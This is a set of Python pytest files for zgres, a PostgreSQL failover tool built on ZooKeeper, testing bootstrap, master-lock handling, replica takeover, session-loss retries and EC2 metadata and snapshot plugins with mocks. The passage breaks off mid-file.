#### File: zgres/tests/test_deadman_integration.py
```python
from configparser import ConfigParser
from unittest import mock
import json
import asyncio
import pytest
from zake.fake_client import FakeClient
from kazoo.client import KazooState
from zgres import deadman
from . import FakeSleeper
@pytest.mark.asyncio
async def test_functional():
"""Test as much of the whole stack as we can."""
config = {'deadman': {
'plugins': 'zgres#zookeeper\nzgres#apt\nzgres#ec2-snapshot\nzgres#ec2\nzgres#follow-the-leader\nzgres#select-furthest-ahead-replica',
},
'apt': {
'postgresql_cluster_name': 'main',
'postgresql_version': '9.5',
},
}
zk = FakeClient()
with mock.patch('zgres.zookeeper.KazooClient') as KazooClient, \
mock.patch('zgres.ec2.boto.utils.get_instance_metadata'):
KazooClient.return_value = zk
app = deadman.App(config)
```
#### File: zgres/tests/test_deadman.py
```python
from unittest.mock import call, patch, Mock
import asyncio
import pytest
from . import FakeSleeper
from . import deadman_app
from . import mock_plugin
def fake_best_replicas(replicas):
l = sorted(replicas, key=lambda x: x[1]['willing'])
if l:
winner = l[0][1]['willing']
l = [i for i in l if winner == i[1]['willing']]
for id, state in l:
yield id, state
def mock_state(replica=False, **kw):
if replica:
defaults = dict(
health_problems={},
replica=replica,
pg_last_xlog_replay_location='68A/16E1DA8',
pg_last_xlog_receive_location='68A/16E1DA8')
else:
defaults = dict(
health_problems={},
replica=replica,
pg_current_xlog_location='68A/16E1DA8')
defaults.update(kw)
return defaults
@pytest.fixture
def app(deadman_app):
return deadman_app(dict(deadman=dict(tick_time=1)))
NO_SUBSCRIBER = object()
def state_getter(app, *extra_states):
def dcs_list_state():
# generate some mock state
for id, state in [(app.my_id, app._state)] + list(extra_states):
yield id, state
return dcs_list_state
def setup_plugins(app, **kw):
plugin = mock_plugin(app._pm)
plugin.best_replicas.side_effect = fake_best_replicas
get_my_id = kw.get('get_my_id', '42')
pg_replication_role = kw.get('pg_replication_role', 'replica')
defaults = {
'pg_replication_role': pg_replication_role,
'pg_get_timeline': 1,
'dcs_get_timeline': 1,
'get_conn_info': dict(host='127.0.0.1'),
'get_my_id': get_my_id,
'dcs_set_database_identifier': True,
'dcs_get_database_identifier': '12345',
'pg_get_database_identifier': '12345',
}
if pg_replication_role == 'master':
defaults['dcs_lock'] = True
defaults.update(kw)
for k, v in defaults.items():
func = getattr(plugin, k)
func.return_value = v
return plugin
def test_master_bootstrap(app):
plugins = setup_plugins(app,
dcs_get_database_identifier=None,
dcs_lock=True,
pg_get_database_identifier='42')
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# check if we have a db identifier set
call.dcs_get_database_identifier(),
# no, ok, init our db
call.pg_initdb(),
# make sure it starts
call.pg_start(),
call.pg_get_database_identifier(),
# lock the database identifier so no-one else gets here
call.dcs_lock('database_identifier'),
# while locked make sure there is no id set in the DCS before we got the lock
call.dcs_get_database_identifier(),
# Make the first backup while locked with no DCS
call.pg_backup(),
# set the database identifier AFTER
call.dcs_set_database_identifier('42')
]
# shut down cleanly and immediately
assert timeout == 0
def test_master_boostrap_fails_to_lock_db_id(app):
plugins = setup_plugins(app,
dcs_get_database_identifier=None,
dcs_lock=False,
pg_get_database_identifier='42')
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# check if we have a db identifier set
call.dcs_get_database_identifier(),
# no, ok, init our db
call.pg_initdb(),
# make sure it starts
call.pg_start(),
call.pg_get_database_identifier(),
# lock the database identifier so no-one else gets here
call.dcs_lock('database_identifier')
]
# shut down cleanly
assert timeout == 5
def test_replica_bootstrap(app):
plugins = setup_plugins(app,
dcs_get_database_identifier='1234')
plugins.pg_get_database_identifier.side_effect = ['42', '1234']
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# make sure postgresql is stopped
call.pg_stop(),
# postgresql restore
call.pg_initdb(),
call.pg_restore(),
call.pg_setup_replication(None),
call.pg_get_database_identifier(),
call.pg_replication_role()
]
# shut down cleanly and immediately
assert timeout == 0
def test_replica_bootstrap_fails_sanity_test(app):
plugins = setup_plugins(app,
pg_replication_role='master',
dcs_get_database_identifier='1234',
pg_get_database_identifier='42')
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# make sure postgresql is stopped
call.pg_stop(),
# postgresql restore
call.pg_initdb(),
call.pg_restore(),
call.pg_setup_replication(None),
call.pg_get_database_identifier(),
call.pg_replication_role(),
call.pg_reset(),
]
# shut down after 5 seconds to try again
assert timeout == 5
@pytest.mark.asyncio
async def test_master_start(app):
plugins = setup_plugins(app,
dcs_get_database_identifier='1234',
dcs_lock=True,
pg_replication_role='master',
pg_get_database_identifier='1234')
def start_monitoring():
app.unhealthy('test_monitor', 'Waiting for first check')
plugins.start_monitoring.side_effect = start_monitoring
# sync startup
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# check if I am a replica
call.pg_replication_role(),
# no, so check if there is a master
call.dcs_lock('master'),
# no master, so sure the DB is running
call.pg_start(),
# start monitoring
call.start_monitoring(),
call.dcs_watch(
app.master_lock_changed,
app._notify_state,
app._notify_conn_info,
),
call.get_conn_info(),
# set our first state
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'master',
'health_problems': {'test_monitor':
{'can_be_replica': False, 'reason': 'Waiting for first check'}}})
]
# Carry on running afterwards
assert timeout == None
assert app.health_problems == {'test_monitor': {'can_be_replica': False, 'reason': 'Waiting for first check'}}
# Our test monitor becomes healthy
plugins.reset_mock()
app.healthy('test_monitor')
assert plugins.mock_calls == [
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'master',
'health_problems': {}}),
call.pg_replication_role(),
call.dcs_lock('master'),
call.dcs_set_conn_info({'host': '127.0.0.1'}),
]
def test_failed_over_master_start(app):
# A master has failed over and restarted, another master has successfully advanced
plugins = setup_plugins(app,
dcs_lock=False,
dcs_get_timeline=2,
pg_get_timeline=1,
pg_replication_role='master')
# sync startup
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# check if I am a replica
call.pg_replication_role(),
# no, so check if there is a master
call.dcs_lock('master'),
call.dcs_get_lock_owner('master'),
call.pg_stop(),
# compare our timeline to what's in the DCS
call.pg_get_timeline(),
call.dcs_get_timeline(),
# we're on an older timeline, so reset
call.pg_reset(),
]
# Carry on running afterwards
assert timeout == 5
def test_replica_start(app):
plugins = setup_plugins(app,
dcs_get_database_identifier='1234',
dcs_lock=True,
pg_replication_role='replica',
pg_get_database_identifier='1234')
app._conn_info['a'] = 'b'
def start_monitoring():
app.unhealthy('test_monitor', 'Waiting for first check')
plugins.start_monitoring.side_effect = start_monitoring
# sync startup
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# check if I am a replica
call.pg_replication_role(),
# not master, so sure the DB is running
call.pg_start(),
# start monitoring
call.start_monitoring(),
call.dcs_watch(
app.master_lock_changed,
app._notify_state,
app._notify_conn_info,
),
# setup our connection info
call.get_conn_info(),
# set our first state
call.dcs_set_state({
'a': 'b',
'host': '127.0.0.1',
'replication_role': 'replica',
'health_problems': {'test_monitor':
{'can_be_replica': False, 'reason': 'Waiting for first check'}},
})
]
# Carry on running afterwards
assert timeout == None
assert app.health_problems == {'test_monitor': {'can_be_replica': False, 'reason': 'Waiting for first check'}}
# Our test monitor becomes healthy
plugins.reset_mock()
with patch('time.time') as mock_time:
app.healthy('test_monitor')
assert plugins.mock_calls == [
call.veto_takeover({'health_problems': {},
'a': 'b',
'replication_role': 'replica',
'host': '127.0.0.1'}),
call.dcs_set_state({'health_problems': {},
'a': 'b',
'replication_role': 'replica',
'host': '127.0.0.1',
'willing': mock_time(),
}),
call.pg_replication_role(),
call.dcs_set_conn_info({'a': 'b', 'host': '127.0.0.1'}),
]
def test_plugin_subscribe_to_state(app):
plugins = setup_plugins(app)
app.initialize()
assert plugins.dcs_watch.mock_calls == [
call.dcs_watch(
app.master_lock_changed,
app._notify_state,
app._notify_conn_info,
)]
def test_plugin_tells_app_to_follow_new_leader(app):
plugins = setup_plugins(app)
app.initialize()
plugins.reset_mock()
app.follow(primary_conninfo=dict(host='127.0.0.9', port=5432))
assert plugins.mock_calls == [
call.pg_replication_role(),
call.pg_setup_replication({'port': 5432, 'host': '127.0.0.9'}),
call.pg_restart()] # must restart for new recovery.conf to take effect
def test_restart_master(app, event_loop):
plugins = setup_plugins(app,
pg_replication_role='master')
app.initialize()
plugins.reset_mock()
with patch('time.sleep') as sleep:
app.restart(10)
assert sleep.called_once_with(10)
event_loop.run_forever() # must be stopped by restart()
assert plugins.mock_calls == [
call.pg_replication_role(),
call.pg_stop(),
call.dcs_disconnect()
]
def test_restart_replica(app, event_loop):
plugins = setup_plugins(app,
pg_replication_role='replica')
app.initialize()
plugins.reset_mock()
with patch('time.sleep') as sleep:
app.restart(10)
assert sleep.called_once_with(10)
event_loop.run_forever() # must be stopped by restart()
assert plugins.mock_calls == [
call.pg_replication_role(),
call.dcs_disconnect()
]
@pytest.mark.asyncio
async def test_master_lock_broken(app):
plugins = setup_plugins(app,
pg_replication_role='master')
assert app.initialize() == None
plugins.reset_mock()
# if the lock is broken, shutdown postgresql and exist
with patch('time.sleep') as sleep:
with patch('sys.exit') as exit:
app.master_lock_changed(None)
assert exit.called_once_with(0)
assert sleep.called_once_with(10)
assert plugins.mock_calls == [
call.pg_replication_role(),
call.pg_replication_role(),
call.pg_stop(),
call.dcs_disconnect(),
call.master_lock_changed(None)
]
assert app._master_lock_owner == None
@pytest.mark.asyncio
async def test_master_lock_changes_owner(app):
# if the lock changes owner to someone else, shutdown postgresql and exist
plugins = setup_plugins(app,
pg_replication_role='master')
assert app.initialize() == None
plugins.reset_mock()
with patch('time.sleep') as sleep:
with patch('sys.exit') as exit:
app.master_lock_changed('someone else')
assert exit.called_once_with(0)
assert sleep.called_once_with(10)
assert plugins.mock_calls == [
call.pg_replication_role(),
call.pg_replication_role(),
call.pg_stop(),
call.dcs_disconnect(),
call.master_lock_changed('someone else')
]
assert app._master_lock_owner == 'someone else'
# if the lock is owned by us, carry on trucking
plugins.reset_mock()
with patch('time.sleep') as sleep:
with patch('sys.exit') as exit:
app.master_lock_changed(app.my_id)
assert exit.called_once_with(0)
assert sleep.called_once_with(10)
assert plugins.mock_calls == [
call.pg_replication_role(),
call.master_lock_changed('42')
]
assert app._master_lock_owner == app.my_id
@pytest.mark.asyncio
async def test_plugin_subscribes_to_master_lock_change(app):
plugins = setup_plugins(app,
pg_get_timeline=42,
master_lock_changed=[('pluginA', None)],
pg_replication_role='replica')
assert app.initialize() == None
plugins.reset_mock()
app.master_lock_changed('someone else')
assert plugins.mock_calls == [
call.pg_replication_role(),
call.master_lock_changed('someone else'),
]
@pytest.mark.asyncio
async def test_replica_reaction_to_master_lock_change(app):
plugins = setup_plugins(app,
pg_get_timeline=42,
pg_replication_role='replica')
assert app.initialize() == None
plugins.reset_mock()
# if the lock changes owner to someone else, carry on trucking
plugins.reset_mock()
app.master_lock_changed('someone else')
assert plugins.mock_calls == [
call.pg_replication_role(),
call.master_lock_changed('someone else')
]
assert app._master_lock_owner == 'someone else'
# if the lock is owned by us, er, we stop replication and become the master
plugins.reset_mock()
plugins.pg_replication_role.side_effect = ['replica', 'master']
app.master_lock_changed(app.my_id)
assert plugins.mock_calls == [
call.pg_replication_role(),
call.dcs_set_state({
'replication_role': 'taking-over',
'willing': None,
'health_problems': {},
'host': '127.0.0.1'}),
call.pg_stop_replication(),
call.pg_replication_role(),
call.pg_get_timeline(),
call.dcs_set_timeline(42),
call.dcs_set_state({
'health_problems': {},
'replication_role': 'master',
'willing': None,
'host': '127.0.0.1'}),
call.master_lock_changed('42')
]
assert app._master_lock_owner == app.my_id
@pytest.mark.asyncio
async def test_replica_tries_to_take_over(app):
plugins = setup_plugins(app,
pg_replication_role='replica')
assert app.initialize() == None
plugins.reset_mock()
# if there is no lock owner, we start looping trying to become master
app.master_lock_changed(None)
assert plugins.mock_calls == [call.pg_replication_role(), call.master_lock_changed(None)]
plugins.reset_mock()
from asyncio import sleep as real_sleep
with patch('asyncio.sleep') as sleep:
sleeper = FakeSleeper()
sleep.side_effect = sleeper
# the first thing is to sleep a bit
await sleeper.next()
assert sleeper.log == [3]
assert plugins.mock_calls == []
# takeover attempted
states = [(app.my_id, {'willing': 99.0}), (app.my_id, {'willing': 100.0})]
plugins.dcs_list_state.return_value = states
await sleeper.next()
assert sleeper.log == [3, 3]
assert plugins.mock_calls == [
call.dcs_list_state(),
call.best_replicas([('42', {'willing': 99.0}), ('42', {'willing': 100.0})]),
call.dcs_lock('master')]
def test_replica_unhealthy(app):
plugins = setup_plugins(app,
pg_replication_role='replica')
app.initialize()
plugins.reset_mock()
app.unhealthy('boom', 'It went Boom')
assert plugins.mock_calls == [
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'replica',
'willing': None, # I am not going to participate in master elections
'health_problems': {'boom': {'reason': 'It went Boom', 'can_be_replica': False}}}),
call.pg_replication_role(),
call.dcs_delete_conn_info(),
]
def test_replica_slightly_sick(app):
plugins = setup_plugins(app,
pg_replication_role='replica')
app.initialize()
plugins.reset_mock()
app.unhealthy('boom', 'It went Boom', can_be_replica=True)
assert plugins.mock_calls == [
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'replica',
'willing': None, # I am not going to participate in master elections
'health_problems': {'boom': {'reason': 'It went Boom', 'can_be_replica': True}}}),
call.pg_replication_role(),
]
@pytest.mark.asyncio
async def test_master_unhealthy(app):
plugins = setup_plugins(app,
pg_replication_role='master')
app.initialize()
plugins.reset_mock()
app.unhealthy('boom', 'It went Boom', can_be_replica=True)
assert plugins.mock_calls == [
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'master',
'health_problems': {'boom': {'reason': 'It went Boom', 'can_be_replica': True}}}),
call.pg_replication_role(),
call.dcs_delete_conn_info(),
]
plugins.reset_mock()
# now we should have _handle_unhealthy_master running
with patch('asyncio.sleep') as sleep, patch('zgres.deadman.App._stop') as exit, patch('time.sleep') as blocking_sleep:
sleeper = FakeSleeper()
sleep.side_effect = sleeper
exit.side_effect = lambda : sleeper.finish()
# there is no replica, so we just sleep and ping the
# DCS to find a willing replica
states = [iter([])]
plugins.dcs_list_state.side_effect = states
await sleeper.next()
assert plugins.mock_calls == [call.dcs_list_state()]
# we add a willing replica
states = [iter([('other', {'willing': 1})])]
plugins.dcs_list_state.side_effect = states
plugins.reset_mock()
await sleeper.next()
assert plugins.mock_calls == [
call.dcs_list_state(),
call.pg_replication_role(),
call.pg_stop(),
call.dcs_disconnect()
]
```
#### File: zgres/tests/test_ec2.py
```python
import pytest
from unittest import mock
from moto import mock_ec2, mock_iam
def mock_get_instance_metadata(**kw):
metadata = {
'ami-id': 'ami-87d579ec',
'instance-id': 'i-00000001',
'instance-type': 't2.micro',
'local-ipv4': '10.1.0.107',
'placement': {'availability-zone': 'us-east-1d'},
'public-ipv4': '172.16.58.3',
'iam': {'info': {
u'InstanceProfileArn': u'arn:aws:iam::139485757383:instance-profile/Role',
u'InstanceProfileId': u'AIPAIKDEOQWOE343AKRIE',
u'Code': u'Success',
u'LastUpdated': u'2015-10-21T20:39:13Z'},
'security-credentials': {'Role': {
u'Code': u'Success',
u'LastUpdated': u'2015-10-21T20:39:29Z',
u'AccessKeyId': u'<KEY>',
u'SecretAccessKey': u'<KEY>',
u'Token': u'<KEY>',
u'Expiration': u'2015-10-22T02:48:46Z',
u'Type': u'AWS-HMAC'}}}
}
metadata.update(kw)
def f(data='meta-data/', **kw):
path = [i for i in data.split('/') if i]
curr = metadata
assert path[0] == 'meta-data'
for i in path[1:]:
curr = curr[i]
return curr
return f
@pytest.fixture
def ec2_plugin():
app = mock.Mock()
app.database_identifier = '4242'
app.config = dict()
from ..ec2 import Ec2Plugin
return Ec2Plugin('zgres#ec2', app)
@mock.patch('boto.utils.get_instance_metadata')
def test_conn_info(get_instance_metadata, ec2_plugin):
get_instance_metadata.side_effect = mock_get_instance_metadata()
ec2_plugin.initialize()
assert ec2_plugin.get_my_id() == 'i-00000001'
assert ec2_plugin.get_conn_info() == {
'ami-id': 'ami-87d579ec',
'availability-zone': 'us-east-1d',
'host': '10.1.0.107',
'instance-type': 't2.micro'}
@pytest.fixture
def ec2_backup_plugin():
app = mock.Mock()
app.database_identifier = '4242'
app.pg_connect_info.return_value = dict(user='postgres', host='example.org')
from ..ec2 import Ec2SnapshotBackupPlugin
return Ec2SnapshotBackupPlugin('zgres#ec2-backup', app)
@pytest.mark.xfail
@mock_ec2
@mock.patch('zgres.ec2.psycopg2')
@mock.patch('boto.utils.get_instance_metadata', autospec=True)
@mock.patch('zgres.ec2.LocalDevice', autospec=True)
@mock.patch('zgres.ec2._all_devices_mounted', autospec=True)
def test_ec2_backup_plugin(_all_devices_mounted, local_device, get_instance_metadata, psycopg2, ec2_backup_plugin):
# setup
import boto.ec2
psycopg2.connect().cursor().fetchall.return_value = [['0/2000060']]
get_instance_metadata.side_effect = mock_get_instance_metadata()
metadata = get_instance_metadata()
az = metadata['placement']['availability-zone']
region = az[:-1]
conn = boto.ec2.connect_to_region(region)
reservation = conn.run_instances('ami-12341234')
instance = reservation.instances[0]
vol_f = conn.create_volume(10, az)
vol_f.attach(instance.id, '/dev/sdf')
vol_g = conn.create_volume(10, az)
vol_g.attach(instance.id, '/dev/sdg')
metadata['instance-id'] = instance.id # act as if we are code running on the server we just launched
# test
ec2_backup_plugin.app.config = {
'ec2-snapshot': {
'dev.1.device': '/dev/sdf',
'dev.1.iops': '1000',
'dev.1.size': '300',
'dev.1.volume_type': 'gp2',
'dev.2.device': '/dev/sdg',
}}
ec2_backup_plugin.initialize()
# make some snapshots
ec2_backup_plugin.pg_backup()
# restore from the snapshots I just made
ec2_backup_plugin.pg_restore()
```
#### File: zgres/tests/test_replication.py
```python
from unittest import mock
import pytest
@pytest.fixture
def follow_the_leader(request):
from ..deadman import App
app = mock.Mock(spec_set=App)
app.my_id = '42'
from ..replication import FollowTheLeader
plugin = FollowTheLeader('zgres#follow-the-leader', app)
return plugin
def test_no_conn_info(follow_the_leader):
# can't follow anything without connection info
follow_the_leader.master_lock_changed(None)
assert follow_the_leader._am_following == None
follow_the_leader.master_lock_changed('not me')
assert follow_the_leader._am_following == None
follow_the_leader.master_lock_changed(follow_the_leader.app.my_id)
assert follow_the_leader._am_following == None
```
#### File: zgres/tests/test_utils.py
```python
def test_pg_lsn_to_int():
from ..utils import pg_lsn_to_int
assert pg_lsn_to_int('67E/AFE198') - pg_lsn_to_int('67D/FECFA308') == 14696080
assert pg_lsn_to_int('0/000000') == 0
assert pg_lsn_to_int('0/00000F') == 15
assert pg_lsn_to_int('1/00000F') == 0xFF00000F
```
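A small usage sketch for the helper exercised above: pg_lsn_to_int converts a PostgreSQL LSN string to an integer, so the difference of two converted LSNs is the replication lag in bytes. The import path assumes the zgres package is installed; the LSN values are taken from the test above.
```python
# Sketch only: assumes the zgres package (and its utils module) is importable.
from zgres.utils import pg_lsn_to_int

master_lsn = '67E/AFE198'
replica_lsn = '67D/FECFA308'

# The difference of the converted LSNs is the replication lag in bytes,
# matching the value asserted in test_pg_lsn_to_int above.
lag_bytes = pg_lsn_to_int(master_lsn) - pg_lsn_to_int(replica_lsn)
print(lag_bytes)  # 14696080 according to the test above
```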
#### File: zgres/tests/test_zookeeper.py
```python
from configparser import ConfigParser
from unittest import mock
import time
import json
import asyncio
import pytest
from zake.fake_client import FakeClient
from kazoo.client import KazooState
import kazoo.exceptions
from zgres import sync
from . import FakeSleeper
class MyFakeClient(FakeClient):
@property
def client_id(self):
return (self.session_id, 'abc')
@pytest.mark.asyncio
async def test_functional(deadman_plugin):
"""Test as much of the whole stack of zgres-sync as we can."""
config = {
'sync': {
'plugins': 'zgres#zookeeper zgres#mock-subscriber'},
'zookeeper': {
'connection_string': 'example.org:2181',
'path': '/mypath',
}
}
deadmanA = deadman_plugin('A')
deadmanB = deadman_plugin('B')
deadmanA.dcs_set_database_identifier('1234')
deadmanA.dcs_set_conn_info(dict(answer=42))
deadmanA.dcs_lock('master')
deadmanB.dcs_set_state(dict(mystate='lamentable'))
ev = asyncio.Event()
async def next_ev():
await ev.wait()
ev.clear()
def set_ev(*args, **kw):
ev.set()
for i in range(10):
asyncio.get_event_loop().call_later(4 + 0.1 * i, set_ev)
from . import MockSyncPlugin as RealMockSyncPlugin
with mock.patch('zgres.tests.MockSyncPlugin') as MockSyncPlugin:
# sigh, FAR too complex
proxy, p = RealMockSyncPlugin('', '')
p.databases.side_effect = set_ev
p.state.side_effect = set_ev
p.masters.side_effect = set_ev
p.conn_info.side_effect = set_ev
MockSyncPlugin.return_value = proxy
with mock.patch('zgres.zookeeper.KazooClient') as KazooClient:
KazooClient.return_value = MyFakeClient(storage=deadmanA._storage._zk._storage)
app = sync.SyncApp(config)
for i in range(3):
await next_ev()
deadmanA.dcs_set_state(dict(mystate='great!'))
deadmanB.dcs_set_conn_info(dict(answer=43))
deadmanA.dcs_unlock('master')
for i in range(3):
await next_ev()
# the plugin was called twice, once with the original data, and once with new data
assert p.conn_info.mock_calls == [
mock.call({'mygroup': {'A': {'answer': 42}}}),
mock.call({'mygroup': {'A': {'answer': 42}, 'B': {'answer': 43}}})]
p.state.assert_has_calls(
[mock.call({'mygroup': {'B': {'mystate': 'lamentable'}}}),
mock.call({'mygroup': {'B': {'mystate': 'lamentable'}, 'A': {'mystate': 'great!'}}})]
)
p.masters.assert_has_calls(
[mock.call({'mygroup': 'A'}),
mock.call({})]
)
p.databases.assert_has_calls([mock.call(['mygroup'])])
@pytest.fixture
def storage(request):
from ..zookeeper import ZookeeperStorage
s = ZookeeperStorage('connection_string', '/path')
zk = MyFakeClient()
with mock.patch('zgres.zookeeper.KazooClient') as KazooClient:
KazooClient.return_value = zk
s.dcs_connect()
return s
@pytest.fixture
def deadman_plugin(request):
from ..deadman import App
storage = None
def factory(my_id='42'):
nonlocal storage
app = mock.Mock(spec_set=App)
app.my_id = my_id
app.restart._is_coroutine = False
app.config = dict(
zookeeper=dict(
connection_string='localhost:1234',
path='/mypath',
group='mygroup',
))
app.master_lock_changed._is_coroutine = False # otherwise tests fail :(
from ..zookeeper import ZooKeeperDeadmanPlugin
plugin = ZooKeeperDeadmanPlugin('zgres#zookeeper', app)
zk = MyFakeClient(storage=storage)
if storage is None:
# all plugins created by this factory SHARE a storage
storage = zk.storage
with mock.patch('zgres.zookeeper.KazooClient') as KazooClient:
KazooClient.return_value = zk
plugin.initialize()
return plugin
return factory
@pytest.mark.asyncio
async def test_disconnect_should_not_restart(deadman_plugin):
plugin = deadman_plugin()
await asyncio.sleep(0.001)
plugin.dcs_disconnect()
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == [] # restart was not called
@pytest.mark.asyncio
async def test_session_suspended(deadman_plugin):
plugin = deadman_plugin()
await asyncio.sleep(0.001)
# suspend the connection
plugin.logger.warn = mock.Mock()
plugin._storage._zk._fire_state_change(KazooState.SUSPENDED)
await asyncio.sleep(0.001)
plugin.logger.warn.assert_called_once_with('zookeeper connection state: SUSPENDED')
assert plugin._dcs_state == 'SUSPENDED'
assert plugin.app.mock_calls == []
@pytest.mark.asyncio
async def test_session_suspended_but_reconnect_in_5_seconds(deadman_plugin):
with mock.patch('zgres.zookeeper.sleep') as sleep:
# yeah, tests with firewalls show that this really does happen
plugin = deadman_plugin()
await asyncio.sleep(0.001)
sleeper = FakeSleeper(max_loops=1000)
sleep.side_effect = sleeper
# suspend the connection
plugin.logger.warn = mock.Mock()
plugin._storage._zk._fire_state_change(KazooState.SUSPENDED)
await sleeper.next()
await sleeper.next()
await sleeper.next()
await sleeper.next()
ntasks = len(asyncio.Task.all_tasks())
plugin._storage._zk._fire_state_change(KazooState.CONNECTED)
time.sleep(0.001)
await asyncio.sleep(0.001)
assert ntasks - len(asyncio.Task.all_tasks()) == 1 # the _check_state task finished
assert plugin.app.mock_calls == []
assert plugin.logger.warn.mock_calls == [
mock.call('zookeeper connection state: SUSPENDED'),
mock.call('zookeeper connection state: CONNECTED'),
]
assert plugin._dcs_state == KazooState.CONNECTED
@pytest.mark.asyncio
async def test_session_suspended_but_never_reconnects_or_is_lost(deadman_plugin):
with mock.patch('zgres.zookeeper.sleep') as sleep:
# yeah, tests with firewalls show that this really does happen
plugin = deadman_plugin()
await asyncio.sleep(0.001)
sleeper = FakeSleeper(max_loops=25)
sleep.side_effect = sleeper
def finish(timeout):
sleeper.finish()
plugin.app.restart.side_effect = finish
# suspend the connection
plugin.logger.warn = mock.Mock()
plugin._storage._zk._fire_state_change(KazooState.SUSPENDED)
await sleeper.wait()
assert plugin.app.mock_calls == [
mock.call.restart(0)
]
assert plugin.logger.warn.mock_calls == [
mock.call('zookeeper connection state: SUSPENDED'),
]
assert plugin._dcs_state == KazooState.SUSPENDED
@pytest.mark.asyncio
async def test_session_lost(deadman_plugin):
plugin = deadman_plugin()
await asyncio.sleep(0.001)
plugin.app.reset_mock()
plugin._storage._zk._fire_state_change(KazooState.LOST)
await asyncio.sleep(0.001)
assert plugin._dcs_state == 'LOST'
assert plugin.app.mock_calls == [
mock.call.restart(0)
]
@pytest.mark.asyncio
async def test_notifications_of_state_change_where_id_has_a_dash(deadman_plugin):
pluginA = deadman_plugin('i-9b61354f')
finished = asyncio.Event()
asyncio.get_event_loop().call_later(5, finished.set)
callback = mock.Mock()
callback.side_effect = lambda *args, **kw: finished.set()
pluginA.dcs_watch(None, callback, None)
pluginA.dcs_set_state(dict(name='A'))
await finished.wait()
assert callback.mock_calls == [
mock.call({'i-9b61354f': {'name': 'A'}}),
]
@pytest.mark.asyncio
async def test_groups_are_independant(deadman_plugin):
plugin = deadman_plugin
pluginA, pluginB, pluginC = plugin('A'), plugin('B'), plugin('C')
pluginC._group_name = 'another'
# pluginB watches state, plugin A doesn't
pluginA.dcs_watch(None, None, None)
callbackB = mock.Mock()
pluginB.dcs_watch(None, callbackB, None)
callbackC = mock.Mock()
pluginC.dcs_watch(None, callbackC, None)
# set state from both plugins
pluginA.dcs_set_state(dict(name='A'))
pluginB.dcs_set_state(dict(name='B'))
pluginC.dcs_set_state(dict(name='C'))
await asyncio.sleep(0.005)
# pluginB gets events, but ONLY from plugins in its group
# i.e. c is ignored
# NOTE: we test only the LAST call as state for A and B may come out-of-order
# but the final, resting state should be correct
assert callbackB.mock_calls[-1] == mock.call({'A': {'name': 'A'}, 'B': {'name': 'B'}})
# C got it's own event
assert callbackC.mock_calls == [
mock.call({'C': {'name': 'C'}}),
]
# We can get all info
assert sorted(pluginA.dcs_list_state()) == sorted(pluginB.dcs_list_state())
assert sorted(pluginA.dcs_list_state()) == [('A', {'name': 'A'}), ('B', {'name': 'B'})]
assert sorted(pluginC.dcs_list_state()) == [('C', {'name': 'C'})]
def test_errorlog_after_second_takeover(deadman_plugin):
plugin = deadman_plugin
# 2 servers with the same id should NOT happen in real life...
pluginA1 = plugin(my_id='A')
pluginA2 = plugin(my_id='A')
pluginA2.logger = mock.Mock()
# now they start to fight
pluginA1.dcs_set_state(dict(server=41))
pluginA2.dcs_set_state(dict(server=42))
pluginA1.dcs_set_state(dict(server=43))
# this is the second time plugin2 is taking over
# We should log an error message now
assert not pluginA2.logger.error.called
pluginA2.dcs_set_state(dict(server=44))
assert pluginA2.logger.error.called
# though the state is still set
assert sorted(pluginA1.dcs_list_state()) == [('A', dict(server=44))]
def test_storage_get_database_identifiers(storage):
assert storage.dcs_get_database_identifiers() == {}
storage.dcs_set_database_identifier('db1', '124')
assert storage.dcs_get_database_identifiers() == {'db1': 124}
def mock_verify(plugin, side_effect):
# cause the verify() function to fail in zake, thus all api calls error
verify = mock.Mock()
verify.side_effect = side_effect
plugin._storage.connection.verify = verify
plugin._kazoo_retry.sleep_func = lambda x: None # speed up tests by not sleeping
return verify
@pytest.mark.asyncio
async def test_retry_on_connection_loss(deadman_plugin):
# connection loss is a temporary exception which seems to happen after a re-connection
# (but not session expiration) in zookeeper. We just retry that till it works.
plugin = deadman_plugin('A')
verify = mock_verify(plugin, [
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
None,
None])
# set state from both plugins
plugin.dcs_set_state(dict(name='A'))
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == []
assert verify.call_count > 4
@pytest.mark.asyncio
async def test_retry_NO_retry_on_session_expired(deadman_plugin):
# session expiration is not retried: the error propagates to the caller
# and the plugin schedules an immediate restart instead
plugin = deadman_plugin('A')
verify = mock_verify(plugin, [kazoo.exceptions.SessionExpiredError()])
# set state from both plugins
with pytest.raises(kazoo.exceptions.SessionExpiredError):
plugin.dcs_set_state(dict(name='A'))
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == [
mock.call.restart(0)
]
@pytest.mark.asyncio
async def test_retry_with_random_exception(deadman_plugin):
# unknown exceptions are not retried: they propagate to the caller
# and no restart is scheduled
plugin = deadman_plugin('A')
class MyException(Exception):
pass
verify = mock_verify(plugin, [MyException()])
# set state from both plugins
with pytest.raises(MyException):
plugin.dcs_set_state(dict(name='A'))
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == []
import time as ttt
@pytest.mark.asyncio
